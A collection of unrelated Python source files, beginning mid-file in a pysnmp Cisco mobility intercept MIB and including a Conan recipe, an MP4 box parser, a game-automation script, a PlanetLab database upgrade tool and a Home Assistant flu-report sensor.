if mibBuilder.loadTexts: cmtapStreamTable.setDescription('The Mobility Stream Table lists the data streams to be intercepted. The same data stream may be required by multiple taps. This essentially provides options for packet selection, only some of which might be used. For example, if all the traffic to or from a subscriber is to be intercepted, one would configure an entry listing SubscriberID along with the SubscriberIDType corresponding to the stream that one wishes to intercept. The first index indicates which Mediation Device the intercepted traffic will be diverted to. The second index, which indicates the specific intercept stream, permits multiple classifiers to be used together. For example, an IP stream and a Mobility stream could both be listed in their respective tables, yet still correspond to the same Mediation Device entry. Entries are added to this table via cmtapStreamStatus in accordance with the RowStatus convention.')
cmtapStreamEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1), ).setIndexNames((0, "CISCO-TAP2-MIB", "cTap2MediationContentId"), (0, "CISCO-TAP2-MIB", "cTap2StreamIndex"))
if mibBuilder.loadTexts: cmtapStreamEntry.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamEntry.setDescription('A stream entry indicates a single data stream to be intercepted to a Mediation Device. Many selected data streams may go to the same application interface and many application interfaces are supported.')
cmtapStreamCalledSubscriberIDType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 1), CmtapSubscriberIDType().clone('unknown')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamCalledSubscriberIDType.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamCalledSubscriberIDType.setDescription('Identifies the type of address that is stored in the cmtapStreamCalledSubscriberID string.')
cmtapStreamCalledSubscriberID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 2), CmtapSubscriberID()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamCalledSubscriberID.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamCalledSubscriberID.setDescription('A string used to identify the party being contacted. The type of this identification is determined by the cmtapStreamCalledSubscriberIDType object.')
cmtapStreamSubscriberIDType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 3), CmtapSubscriberIDType().clone('unknown')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamSubscriberIDType.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamSubscriberIDType.setDescription('Identifies the type of address that is stored in the cmtapStreamSubscriberID string.')
cmtapStreamSubscriberID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 4), CmtapSubscriberID()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamSubscriberID.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamSubscriberID.setDescription('A string used to identify the subscriber to tap. The type of this indentification is determined by the cmtapStreamSubscriberIDType object.')
cmtapStreamStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 5), StorageType().clone('volatile')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamStorageType.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamStorageType.setDescription("This object specifies the storage type of this conceptual row. If it is set to 'nonVolatile', this entry can be saved into non-volatile memory.")
cmtapStreamStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 6), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamStatus.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamStatus.setDescription("The status of this conceptual row. This object manages creation, modification, and deletion of rows in this table. When any field must be changed, cmtapStreamStatus must be first set to 'notInService'.")
cmtapStreamLIIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 7), CmtapLawfulInterceptID().clone('not set')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamLIIdentifier.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamLIIdentifier.setDescription('This object is an identifier assigned by a Law Enforcement Agency (LEA) to facilitate LI operations as defined in 3GPP TS 33.108 v8.7.0 standards document.')
cmtapStreamLocationInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 8), TruthValue().clone('true')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamLocationInfo.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamLocationInfo.setDescription('This object indicates, if the userLocationInfo object should be included in the Intercept Related Information (IRI) messages sent by the gateway to mediation gateway(s) for interception taps. The userLocationInfo is defined as part of the IRI messages in 3GPP 33.108 v8.7.0 standards document.')
cmtapStreamInterceptType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 672, 1, 1, 2, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("ccOnly", 1), ("iriOnly", 2), ("both", 3))).clone('both')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cmtapStreamInterceptType.setStatus('current')
if mibBuilder.loadTexts: cmtapStreamInterceptType.setDescription('This object indicates the intercept type of the tapped stream. The tap can be provisioned to intercept control messages (IRI) from the tapped stream, the payload (CC) messages from the tapped stream or both. The format of these messages in defined in 3GPP TS 33.108 v8.7.0 standards document. ccOnly(1) - Content of communication interception only. iriOnly(2) - Intercept Related Information only. both(3) - Intercept both: CC and IRI.')
ciscoMobilityTapMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 1))
ciscoMobilityTapMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 2))
ciscoMobilityTapMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 1, 1)).setObjects(("CISCO-MOBILITY-TAP-MIB", "ciscoMobilityTapCapabilityGroup"), ("CISCO-MOBILITY-TAP-MIB", "ciscoMobilityTapStreamGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMobilityTapMIBCompliance = ciscoMobilityTapMIBCompliance.setStatus('deprecated')
if mibBuilder.loadTexts: ciscoMobilityTapMIBCompliance.setDescription('The compliance statement for entities which implement the Cisco Intercept MIB for Mobility Gateways')
ciscoMobilityTapMIBComplianceRev01 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 1, 2)).setObjects(("CISCO-MOBILITY-TAP-MIB", "ciscoMobilityTapCapabilityGroup"), ("CISCO-MOBILITY-TAP-MIB", "ciscoMobilityTapStreamGroup"), ("CISCO-MOBILITY-TAP-MIB", "ciscoMobilityTapStreamGroupSup1"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMobilityTapMIBComplianceRev01 = ciscoMobilityTapMIBComplianceRev01.setStatus('current')
if mibBuilder.loadTexts: ciscoMobilityTapMIBComplianceRev01.setDescription('The compliance statement for entities which implement the Cisco Intercept MIB for Mobility Gateways.')
ciscoMobilityTapCapabilityGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 2, 1)).setObjects(("CISCO-MOBILITY-TAP-MIB", "cmtapStreamCapabilities"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMobilityTapCapabilityGroup = ciscoMobilityTapCapabilityGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoMobilityTapCapabilityGroup.setDescription('A collection of objects which provide Mobility Gateway capabilities for the system.')
ciscoMobilityTapStreamGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 2, 2)).setObjects(("CISCO-MOBILITY-TAP-MIB", "cmtapStreamCalledSubscriberIDType"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamCalledSubscriberID"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamSubscriberIDType"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamSubscriberID"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamStorageType"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMobilityTapStreamGroup = ciscoMobilityTapStreamGroup.setStatus('current')
if mibBuilder.loadTexts: ciscoMobilityTapStreamGroup.setDescription('A collection of objects which provide information about the stream from which we wish to intercept packets.')
ciscoMobilityTapStreamGroupSup1 = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 672, 2, 2, 3)).setObjects(("CISCO-MOBILITY-TAP-MIB", "cmtapStreamLIIdentifier"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamLocationInfo"), ("CISCO-MOBILITY-TAP-MIB", "cmtapStreamInterceptType"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ciscoMobilityTapStreamGroupSup1 = ciscoMobilityTapStreamGroupSup1.setStatus('current')
if mibBuilder.loadTexts: ciscoMobilityTapStreamGroupSup1.setDescription('A collection of objects which provide additional information about the stream from which we wish to intercept packets.')
mibBuilder.exportSymbols("CISCO-MOBILITY-TAP-MIB", cmtapStreamInterceptType=cmtapStreamInterceptType, ciscoMobilityTapMIBConform=ciscoMobilityTapMIBConform, CmtapLawfulInterceptID=CmtapLawfulInterceptID, cmtapStreamStorageType=cmtapStreamStorageType, cmtapStreamGroup=cmtapStreamGroup, cmtapStreamCalledSubscriberIDType=cmtapStreamCalledSubscriberIDType, ciscoMobilityTapMIBNotifs=ciscoMobilityTapMIBNotifs, cmtapStreamCalledSubscriberID=cmtapStreamCalledSubscriberID, CmtapSubscriberID=CmtapSubscriberID, ciscoMobilityTapMIBComplianceRev01=ciscoMobilityTapMIBComplianceRev01, cmtapStreamTable=cmtapStreamTable, cmtapStreamSubscriberID=cmtapStreamSubscriberID, cmtapStreamEntry=cmtapStreamEntry, PYSNMP_MODULE_ID=ciscoMobilityTapMIB, ciscoMobilityTapStreamGroupSup1=ciscoMobilityTapStreamGroupSup1, cmtapStreamLocationInfo=cmtapStreamLocationInfo, cmtapStreamLIIdentifier=cmtapStreamLIIdentifier, ciscoMobilityTapStreamGroup=ciscoMobilityTapStreamGroup, ciscoMobilityTapMIBGroups=ciscoMobilityTapMIBGroups, cmtapStreamSubscriberIDType=cmtapStreamSubscriberIDType, cmtapStreamStatus=cmtapStreamStatus, ciscoMobilityTapMIBCompliance=ciscoMobilityTapMIBCompliance, ciscoMobilityTapMIB=ciscoMobilityTapMIB, ciscoMobilityTapMIBCompliances=ciscoMobilityTapMIBCompliances, cmtapStreamCapabilities=cmtapStreamCapabilities, ciscoMobilityTapCapabilityGroup=ciscoMobilityTapCapabilityGroup, CmtapSubscriberIDType=CmtapSubscriberIDType, ciscoMobilityTapMIBObjects=ciscoMobilityTapMIBObjects)
| python |
from conans import ConanFile, tools
class McapConan(ConanFile):
name = "mcap"
version = "0.0.1"
url = "https://github.com/foxglove/mcap"
homepage = "https://github.com/foxglove/mcap"
description = "A C++ implementation of the MCAP file format"
license = "Apache-2.0"
topics = ("mcap", "serialization", "deserialization", "recording")
settings = ("os", "compiler", "build_type", "arch")
requires = ("fmt/8.1.1", "lz4/1.9.3", "zstd/1.5.2")
generators = "cmake"
def validate(self):
tools.check_min_cppstd(self, "17")
def configure(self):
pass
def package(self):
self.copy(pattern="LICENSE", dst="licenses")
self.copy("include/*")
def package_id(self):
self.info.header_only()
| python |
# -----------------------------------
# import
# -----------------------------------
from .basebox import FullBox
from heifpy.file import BinaryFileReader
# -----------------------------------
# define
# -----------------------------------
# -----------------------------------
# function
# -----------------------------------
# -----------------------------------
# class
# -----------------------------------
class MovieHeaderBox(FullBox):
"""
ISO/IEC 14496-12
Box Type: ‘mvhd’
Container: Movie Box (‘moov’)
Mandatory: Yes
Quantity: Exactly One
"""
def __init__(self):
super(MovieHeaderBox, self).__init__()
self.creation_time = 0
self.modification_time = 0
self.timescale = 0
self.duration = 0
self.rate = 0
self.volume = 0
self.matrix = 0
self.predefined = 0
self.next_track_ID = 0
def parse(self, reader: BinaryFileReader) -> None:
super(MovieHeaderBox, self).parse(reader)
if self.get_version() == 1:
self.creation_time = reader.read64()
self.modification_time = reader.read64()
self.timescale = reader.read32()
self.duration = reader.read64()
else:
self.creation_time = reader.read32()
self.modification_time = reader.read32()
self.timescale = reader.read32()
self.duration = reader.read32()
self.rate = reader.read32()
self.volume = reader.read16()
reader.read16() # reserved
reader.read32() # reserved
reader.read32() # reserved
self.matrix = []
for _ in range(9):
self.matrix.append(reader.read32())
self.predefined = []
for _ in range(6):
self.predefined.append(reader.read32())
self.next_track_ID = reader.read32()
assert self.read_complete(reader), f'{self.type} num bytes left not 0.'
def print_box(self) -> None:
super(MovieHeaderBox, self).print_box()
print("creation_time :", self.creation_time)
print("modification_time :", self.modification_time)
print("timescale :", self.timescale)
print("duration :", self.duration)
print("rate :", self.rate)
print("volume :", self.volume)
print("matrix :", self.matrix)
print("predefined :", self.predefined)
print("next_track_ID :", self.next_track_ID)
# -----------------------------------
# main
# -----------------------------------
if __name__ == '__main__':
pass
| python |
import base64
def decode(data):
# adding extra = for padding if needed
pad = len(data) % 4
if pad > 0:
data += "=" * (4 - pad)
return base64.urlsafe_b64decode(data)
| python |
import screendetect
import os
import sys
import time
import keyboard
import pyautogui
import playsound
import pydirectinput
def play():
pass
def start():
time.sleep(3)
pydirectinput.click(900, 550)
pydirectinput.click(1239, 957)
pydirectinput.click(670, 1018)
screendetect.wait_for_screen('loading', 0.9)
time.sleep(0.5)
playsound(os.getcwd() + '/media/sounds/xp.wav')
def loop():
keyboard.add_hotkey('q', sys.exit, args=(0))
start()
while True:
play()
if __name__ == '__main__':
loop() | python |
#!/usr/bin/env python3
#
# Tool for upgrading/converting a db
# Requirements:
# 1) Databse Schema - schema for the new database you what to upgrade to
# 2) Config File - the config file that describes how to convert the db
#
# Notes:
# 1) Will attempt to convert the db defined in /etc/planetlab/plc_config
# 2) Does not automatically drop archived database. They must be removed
# manually
import sys
import os
import getopt
import pgdb
config = {}
config_file = "/etc/planetlab/plc_config"
exec(compile(open(config_file).read(), config_file, 'exec'), config)
upgrade_config_file = "plcdb.3-4.conf"
schema_file = "planetlab4.sql"
temp_dir = "/tmp"
def usage():
print("Usage: %s [OPTION] UPGRADE_CONFIG_FILE " % sys.argv[0])
print("Options:")
print(" -s, --schema=FILE Upgraded Database Schema")
print(" -t, --temp-dir=DIR Temp Directory")
print(" --help This message")
sys.exit(1)
try:
(opts, argv) = getopt.getopt(sys.argv[1:],
"s:d:",
["schema=",
"temp-dir=",
"help"])
except getopt.GetoptError as err:
print("Error: ", err.msg)
usage()
for (opt, optval) in opts:
if opt == "-s" or opt == "--schema":
schema_file = optval
elif opt == "-d" or opt == "--temp-dir":
temp_dir = optval
elif opt == "--help":
usage()
try:
upgrade_config_file = argv[0]
except IndexError:
print("Error: too few arguments")
usage()
schema = {}
inserts = []
schema_items_ordered = []
sequences = {}
temp_tables = {}
# load conf file for this upgrade
try:
upgrade_config = {}
exec(compile(open(upgrade_config_file).read(), upgrade_config_file, 'exec'), upgrade_config)
upgrade_config.pop('__builtins__')
db_version_previous = upgrade_config['DB_VERSION_PREVIOUS']
db_version_new = upgrade_config['DB_VERSION_NEW']
except IOError as fault:
print("Error: upgrade config file (%s) not found. Exiting" % \
(fault))
sys.exit(1)
except KeyError as fault:
print("Error: %s not set in upgrade confing (%s). Exiting" % \
(fault, upgrade_config_file))
sys.exit(1)
def connect():
db = pgdb.connect(user = config['PLC_DB_USER'],
database = config['PLC_DB_NAME'])
return db
def archive_db(database, archived_database):
archive_db = " dropdb -U postgres %s > /dev/null 2>&1;" \
" psql template1 postgres -qc " \
" 'ALTER DATABASE %s RENAME TO %s;';" % \
(archived_database, database, archived_database)
exit_status = os.system(archive_db)
if exit_status:
print("Error: unable to archive database. Upgrade failed")
sys.exit(1)
#print "Status: %s has been archived. now named %s" % (database, archived_database)
def encode_utf8(inputfile_name, outputfile_name):
# rewrite a iso-8859-1 encoded file in utf8
try:
inputfile = open(inputfile_name, 'r')
outputfile = open(outputfile_name, 'w')
for line in inputfile:
if line.upper().find('SET CLIENT_ENCODING') > -1:
continue
outputfile.write(str(line, 'iso-8859-1').encode('utf8'))
inputfile.close()
outputfile.close()
except:
print('error encoding file')
raise
def create_item_from_schema(item_name):
try:
(type, body_list) = schema[item_name]
exit_status = os.system('psql %s %s -qc "%s" > /dev/null 2>&1' % \
(config['PLC_DB_NAME'], config['PLC_DB_USER'],"".join(body_list) ) )
if exit_status:
raise Exception
except Exception as fault:
print('Error: create %s failed. Check schema.' % item_name)
sys.exit(1)
raise fault
except KeyError:
print("Error: cannot create %s. definition not found in %s" % \
(key, schema_file))
return False
def fix_row(row, table_name, table_fields):
if table_name in ['interfaces']:
# convert str bwlimit to bps int
bwlimit_index = table_fields.index('bwlimit')
if isinstance(row[bwlimit_index], int):
pass
elif row[bwlimit_index].find('mbit') > -1:
row[bwlimit_index] = int(row[bwlimit_index].split('mbit')[0]) \
* 1000000
elif row[bwlimit_index].find('kbit') > -1:
row[bwlimit_index] = int(row[bwlimit_index].split('kbit')[0]) \
* 1000
elif table_name in ['slice_attribute']:
# modify some invalid foreign keys
attribute_type_index = table_fields.index('attribute_type_id')
if row[attribute_type_index] == 10004:
row[attribute_type_index] = 10016
elif row[attribute_type_index] == 10006:
row[attribute_type_index] = 10017
elif row[attribute_type_index] in [10031, 10033]:
row[attribute_type_index] = 10037
elif row[attribute_type_index] in [10034, 10035]:
row[attribute_type_index] = 10036
elif table_name in ['slice_attribute_types']:
type_id_index = table_fields.index('attribute_type_id')
if row[type_id_index] in [10004, 10006, 10031, 10033, 10034, 10035]:
return None
return row
def fix_table(table, table_name, table_fields):
if table_name in ['slice_attribute_types']:
# remove duplicate/redundant primary keys
type_id_index = table_fields.index('attribute_type_id')
for row in table:
if row[type_id_index] in [10004, 10006, 10031, 10033, 10034, 10035]:
table.remove(row)
return table
def remove_temp_tables():
# remove temp_tables
try:
for temp_table in temp_tables:
os.remove(temp_tables[temp_table])
except:
raise
def generate_temp_table(table_name, db):
cursor = db.cursor()
try:
# get upgrade directions
table_def = upgrade_config[table_name].replace('(', '').replace(')', '').split(',')
table_fields, old_fields, joins, wheres = [], [], set(), set()
for field in table_def:
field_parts = field.strip().split(':')
table_fields.append(field_parts[0])
old_fields.append(field_parts[1])
if field_parts[2:]:
joins.update(set([x for x in field_parts[2:] if not x.find('=') > -1]))
wheres.update(set([x for x in field_parts[2:] if x.find('=') > -1]))
# get indices of fields that cannot be null
(type, body_list) = schema[table_name]
not_null_indices = []
for field in table_fields:
for body_line in body_list:
if body_line.find(field) > -1 and \
body_line.upper().find("NOT NULL") > -1:
not_null_indices.append(table_fields.index(field))
# get index of primary key
primary_key_indices = []
for body_line in body_list:
if body_line.find("PRIMARY KEY") > -1:
primary_key = body_line
for field in table_fields:
if primary_key.find(" "+field+" ") > -1:
primary_key_indices.append(table_fields.index(field))
#break
# get old data
get_old_data = "SELECT DISTINCT %s FROM %s" % \
(", ".join(old_fields), old_fields[0].split(".")[0])
for join in joins:
get_old_data = get_old_data + " INNER JOIN %s USING (%s) " % \
(join.split('.')[0], join.split('.')[1])
if wheres:
get_old_data = get_old_data + " WHERE "
for where in wheres:
get_old_data = get_old_data + " %s" % where
cursor.execute(get_old_data)
rows = cursor.fetchall()
# write data to a temp file
temp_file_name = '%s/%s.tmp' % (temp_dir, table_name)
temp_file = open(temp_file_name, 'w')
for row in rows:
# attempt to make any necessary fixes to data
row = fix_row(row, table_name, table_fields)
# do not attempt to write null rows
if row == None:
continue
# do not attempt to write rows with null primary keys
if [x for x in primary_key_indices if row[x] == None]:
continue
for i in range(len(row)):
# convert nulls into something pg can understand
if row[i] == None:
if i in not_null_indices:
# XX doesnt work if column is int type
row[i] = ""
else:
row[i] = "\N"
if isinstance(row[i], int) or isinstance(row[i], float):
row[i] = str(row[i])
# escape whatever can mess up the data format
if isinstance(row[i], str):
row[i] = row[i].replace('\t', '\\t')
row[i] = row[i].replace('\n', '\\n')
row[i] = row[i].replace('\r', '\\r')
data_row = "\t".join(row)
temp_file.write(data_row + "\n")
temp_file.write("\.\n")
temp_file.close()
temp_tables[table_name] = temp_file_name
except KeyError:
#print "WARNING: cannot upgrade %s. upgrade def not found. skipping" % \
# (table_name)
return False
except IndexError as fault:
print("Error: error found in upgrade config file. " \
"check %s configuration. Aborting " % \
(table_name))
sys.exit(1)
except:
print("Error: configuration for %s doesnt match db schema. " \
" Aborting" % (table_name))
try:
db.rollback()
except:
pass
raise
# Connect to current db
db = connect()
cursor = db.cursor()
# determin current db version
try:
cursor.execute("SELECT relname from pg_class where relname = 'plc_db_version'")
rows = cursor.fetchall()
if not rows:
print("Warning: current db has no version. Unable to validate config file.")
else:
cursor.execute("SELECT version FROM plc_db_version")
rows = cursor.fetchall()
if not rows or not rows[0]:
print("Warning: current db has no version. Unable to validate config file.")
elif rows[0][0] == db_version_new:
print("Status: Versions are the same. No upgrade necessary.")
sys.exit()
elif not rows[0][0] == db_version_previous:
print("Stauts: DB_VERSION_PREVIOUS in config file (%s) does not" \
" match current db version %d" % (upgrade_config_file, rows[0][0]))
sys.exit()
else:
print("STATUS: attempting upgrade from %d to %d" % \
(db_version_previous, db_version_new))
# check db encoding
sql = " SELECT pg_catalog.pg_encoding_to_char(d.encoding)" \
" FROM pg_catalog.pg_database d " \
" WHERE d.datname = '%s' " % config['PLC_DB_NAME']
cursor.execute(sql)
rows = cursor.fetchall()
if rows[0][0] not in ['UTF8', 'UNICODE']:
print("WARNING: db encoding is not utf8. Attempting to encode")
db.close()
# generate db dump
dump_file = '%s/dump.sql' % (temp_dir)
dump_file_encoded = dump_file + ".utf8"
dump_cmd = 'pg_dump -i %s -U postgres -f %s > /dev/null 2>&1' % \
(config['PLC_DB_NAME'], dump_file)
if os.system(dump_cmd):
print("ERROR: during db dump. Exiting.")
sys.exit(1)
# encode dump to utf8
print("Status: encoding database dump")
encode_utf8(dump_file, dump_file_encoded)
# archive original db
archive_db(config['PLC_DB_NAME'], config['PLC_DB_NAME']+'_sqlascii_archived')
# create a utf8 database and upload encoded data
recreate_cmd = 'createdb -U postgres -E UTF8 %s > /dev/null; ' \
'psql -a -U %s %s < %s > /dev/null 2>&1;' % \
(config['PLC_DB_NAME'], config['PLC_DB_USER'], \
config['PLC_DB_NAME'], dump_file_encoded)
print("Status: recreating database as utf8")
if os.system(recreate_cmd):
print("Error: database encoding failed. Aborting")
sys.exit(1)
os.remove(dump_file_encoded)
os.remove(dump_file)
except:
raise
db = connect()
cursor = db.cursor()
# parse the schema user wishes to upgrade to
try:
file = open(schema_file, 'r')
index = 0
lines = file.readlines()
while index < len(lines):
line = lines[index]
if line.find("--") > -1:
line_parts = line.split("--")
line = line_parts[0]
# find all created objects
if line.startswith("CREATE"):
line_parts = line.split(" ")
if line_parts[1:3] == ['OR', 'REPLACE']:
line_parts = line_parts[2:]
item_type = line_parts[1]
item_name = line_parts[2]
schema_items_ordered.append(item_name)
if item_type in ['INDEX']:
schema[item_name] = (item_type, line)
# functions, tables, views span over multiple lines
# handle differently than indexes
elif item_type in ['AGGREGATE', 'TABLE', 'VIEW']:
fields = [line]
while index < len(lines):
index = index + 1
nextline =lines[index]
if nextline.find("--") > -1:
new_line_parts = nextline.split("--")
nextline = new_line_parts[0]
# look for any sequences
if item_type in ['TABLE'] and nextline.find('serial') > -1:
sequences[item_name] = nextline.strip().split()[0]
fields.append(nextline)
if nextline.find(";") >= 0:
break
schema[item_name] = (item_type, fields)
else:
print("Error: unknown type %s" % item_type)
elif line.startswith("INSERT"):
inserts.append(line)
index = index + 1
except:
raise
print("Status: generating temp tables")
# generate all temp tables
for key in schema_items_ordered:
(type, body_list) = schema[key]
if type == 'TABLE':
generate_temp_table(key, db)
# disconenct from current database and archive it
cursor.close()
db.close()
print("Status: archiving database")
archive_db(config['PLC_DB_NAME'], config['PLC_DB_NAME']+'_archived')
os.system('createdb -U postgres -E UTF8 %s > /dev/null; ' % config['PLC_DB_NAME'])
print("Status: upgrading database")
# attempt to create and load all items from schema into temp db
try:
for key in schema_items_ordered:
(type, body_list) = schema[key]
create_item_from_schema(key)
if type == 'TABLE':
if key in upgrade_config:
# attempt to populate with temp table data
table_def = upgrade_config[key].replace('(', '').replace(')', '').split(',')
table_fields = [field.strip().split(':')[0] for field in table_def]
insert_cmd = "psql %s %s -c " \
" 'COPY %s (%s) FROM stdin;' < %s " % \
(config['PLC_DB_NAME'], config['PLC_DB_USER'], key,
", ".join(table_fields), temp_tables[key] )
exit_status = os.system(insert_cmd)
if exit_status:
print("Error: upgrade %s failed" % key)
sys.exit(1)
# update the primary key sequence
if key in sequences:
sequence = key +"_"+ sequences[key] +"_seq"
update_seq = "psql %s %s -c " \
" \"select setval('%s', max(%s)) FROM %s;\" > /dev/null" % \
(config['PLC_DB_NAME'], config['PLC_DB_USER'], sequence,
sequences[key], key)
exit_status = os.system(update_seq)
if exit_status:
print("Error: sequence %s update failed" % sequence)
sys.exit(1)
else:
# check if there are any insert stmts in schema for this table
print("Warning: %s has no temp data file. Unable to populate with old data" % key)
for insert_stmt in inserts:
if insert_stmt.find(key) > -1:
insert_cmd = 'psql %s postgres -qc "%s;" > /dev/null 2>&1' % \
(config['PLC_DB_NAME'], insert_stmt)
os.system(insert_cmd)
except:
print("Error: failed to populate db. Unarchiving original database and aborting")
undo_command = "dropdb -U postgres %s > /dev/null; psql template1 postgres -qc" \
" 'ALTER DATABASE %s RENAME TO %s;'; > /dev/null" % \
(config['PLC_DB_NAME'], config['PLC_DB_NAME']+'_archived', config['PLC_DB_NAME'])
os.system(undo_command)
#remove_temp_tables()
raise
#remove_temp_tables()
print("upgrade complete")
| python |
"""Support for user- and CDC-based flu info sensors from Flu Near You."""
from homeassistant.const import (
ATTR_ATTRIBUTION,
ATTR_STATE,
CONF_LATITUDE,
CONF_LONGITUDE,
)
from homeassistant.core import callback
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from .const import CATEGORY_CDC_REPORT, CATEGORY_USER_REPORT, DATA_COORDINATOR, DOMAIN
ATTR_CITY = "city"
ATTR_REPORTED_DATE = "reported_date"
ATTR_REPORTED_LATITUDE = "reported_latitude"
ATTR_REPORTED_LONGITUDE = "reported_longitude"
ATTR_STATE_REPORTS_LAST_WEEK = "state_reports_last_week"
ATTR_STATE_REPORTS_THIS_WEEK = "state_reports_this_week"
ATTR_ZIP_CODE = "zip_code"
DEFAULT_ATTRIBUTION = "Data provided by Flu Near You"
SENSOR_TYPE_CDC_LEVEL = "level"
SENSOR_TYPE_CDC_LEVEL2 = "level2"
SENSOR_TYPE_USER_CHICK = "chick"
SENSOR_TYPE_USER_DENGUE = "dengue"
SENSOR_TYPE_USER_FLU = "flu"
SENSOR_TYPE_USER_LEPTO = "lepto"
SENSOR_TYPE_USER_NO_SYMPTOMS = "none"
SENSOR_TYPE_USER_SYMPTOMS = "symptoms"
SENSOR_TYPE_USER_TOTAL = "total"
CDC_SENSORS = [
(SENSOR_TYPE_CDC_LEVEL, "CDC Level", "mdi:biohazard", None),
(SENSOR_TYPE_CDC_LEVEL2, "CDC Level 2", "mdi:biohazard", None),
]
USER_SENSORS = [
(SENSOR_TYPE_USER_CHICK, "Avian Flu Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_DENGUE, "Dengue Fever Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_FLU, "Flu Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_LEPTO, "Leptospirosis Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_NO_SYMPTOMS, "No Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_SYMPTOMS, "Flu-like Symptoms", "mdi:alert", "reports"),
(SENSOR_TYPE_USER_TOTAL, "Total Symptoms", "mdi:alert", "reports"),
]
EXTENDED_SENSOR_TYPE_MAPPING = {
SENSOR_TYPE_USER_FLU: "ili",
SENSOR_TYPE_USER_NO_SYMPTOMS: "no_symptoms",
SENSOR_TYPE_USER_TOTAL: "total_surveys",
}
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up Flu Near You sensors based on a config entry."""
coordinators = hass.data[DOMAIN][DATA_COORDINATOR][config_entry.entry_id]
sensors = []
for (sensor_type, name, icon, unit) in CDC_SENSORS:
sensors.append(
CdcSensor(
coordinators[CATEGORY_CDC_REPORT],
config_entry,
sensor_type,
name,
icon,
unit,
)
)
for (sensor_type, name, icon, unit) in USER_SENSORS:
sensors.append(
UserSensor(
coordinators[CATEGORY_USER_REPORT],
config_entry,
sensor_type,
name,
icon,
unit,
)
)
async_add_entities(sensors)
class FluNearYouSensor(CoordinatorEntity):
"""Define a base Flu Near You sensor."""
def __init__(self, coordinator, config_entry, sensor_type, name, icon, unit):
"""Initialize the sensor."""
super().__init__(coordinator)
self._attrs = {ATTR_ATTRIBUTION: DEFAULT_ATTRIBUTION}
self._config_entry = config_entry
self._icon = icon
self._name = name
self._sensor_type = sensor_type
self._state = None
self._unit = unit
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
return self._attrs
@property
def icon(self):
"""Return the icon."""
return self._icon
@property
def name(self):
"""Return the name."""
return self._name
@property
def state(self):
"""Return the state."""
return self._state
@property
def unique_id(self):
"""Return a unique, Home Assistant friendly identifier for this entity."""
return (
f"{self._config_entry.data[CONF_LATITUDE]},"
f"{self._config_entry.data[CONF_LONGITUDE]}_{self._sensor_type}"
)
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return self._unit
@callback
def _handle_coordinator_update(self) -> None:
"""Handle updated data from the coordinator."""
self.update_from_latest_data()
self.async_write_ha_state()
async def async_added_to_hass(self):
"""Register callbacks."""
await super().async_added_to_hass()
self.update_from_latest_data()
@callback
def update_from_latest_data(self):
"""Update the sensor."""
